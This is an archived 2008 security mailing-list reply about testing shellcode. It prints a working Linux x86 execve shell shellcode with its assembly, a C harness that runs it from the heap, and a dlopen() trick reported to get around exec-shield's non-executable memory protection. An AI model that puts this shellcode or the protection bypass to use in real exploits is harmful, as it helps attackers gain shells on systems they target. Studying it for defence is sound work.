Re: Simple Buffer Overflow (shell testing)

From: Vuln Dev (vulndev3@gmail.com)
Date: Tue Jan 15 2008 - 09:04:17 EST


On 10 Jan 2008 02:09:46 -0000, <loki6@orange.nl> wrote:

[snip]

>
> - How do I test shellcode
>

Hi all.
Ironmonkey6, I tested your shellcode on my Fedora Core 7 and it did not work.
It seems to fail to correctly set %eax to 0xb and segfaults,
but could be my environment test is bad, infact go on ...
... for me worked this code:

--------------------------------8<-----------------------------------------
#include <dlfcn.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/shm.h>

char shellcode[23] =
 "\x6a\x0b" // push $0xb
 "\x58" // pop %eax // This push/pop sets %eax to 0x0b
 "\x99" // cltd
 "\x52" // push %edx
 "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
 "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
 "\x89\xe3" // mov %esp,%ebx
 "\x52" // push %edx
 "\x53" // push %ebx
 "\x89\xe1" // mov %esp,%ecx
 "\xcd\x80"; // int $0x80

main()
  {
  // ld-linux.so loosens attributes on non-exec
  // shared memory and heap?
  //
  dlopen("/lib/libm.so.6",RTLD_LAZY);

  // SHARED MEMORY: attach shm to addr
  //
  // int shmid;
  // void *addr;
  //
  // shmid=shmget(IPC_PRIVATE,200,0700);
  // addr=shmat(shmid,NULL,0700);

  // HEAP
  //
  void *addr;
  addr=malloc(23);

  memcpy(addr,shellcode,23);

  void (* f)();
  f=(void *)addr;
  f();
  }
--------------------------------8<-----------------------------------------

Curious about why the dlopen() stuff is just there?
No? Ok I'll tell anyway :)
I had some problems to bypass OS security settings
on non-exec stack and heap and shared memory (... and what else ..).
My pogram "correctly" showed no "wx" permissions in /proc/<pid>/maps so
I could not execute the shellcode in no other way than using inline assembly.
Strangely enough it turned out that the easiest way was calling dlopen() before
jumping into the heap.
Only my two cents, hope this helps.

Sorry for my bad English,
thankyou everybody,
Roberto.

Question: is anybody able to reproduce the same strange dlopen() behaviour?

/proc/sys/kernel/exec-shield-randomize is 1
and
/proc/sys/kernel/exec-shield is 1

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:20 EDT